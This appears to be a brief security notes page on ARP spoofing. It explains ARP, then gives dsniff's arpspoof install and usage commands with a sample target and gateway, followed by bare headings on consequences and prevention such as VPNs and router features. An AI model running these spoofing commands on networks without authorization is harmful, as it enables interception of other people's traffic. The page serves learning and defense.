ARP spoof/poison
The Address Resolution Protocol (ARP) is a networking protocol used on a local network for address resolution, to discover the MAC/hardware address of a device associated with an IP address.
dSniff's arpspoof tool
Installation
$ sudo apt install dsniffUsage
$ sudo arpspoof -i <iface> -t <target_ip> <host_ip_to_spoof_as> $ sudo arpspoof -i eth0 -t 192.168.1.22 192.168.1.254 $ arp -aOther experimentation
Windows defender firewall
Elicit a false and non-existent IP address mapping in the ARP table
When will a device send an ARP request?
Demonstration
Possible attack scenario (not tested)
Consequences
Prevention methods
1. Virtual Private Network (VPN)
2. Third-party firewall provider
3. Router security features
Resources
Last updated

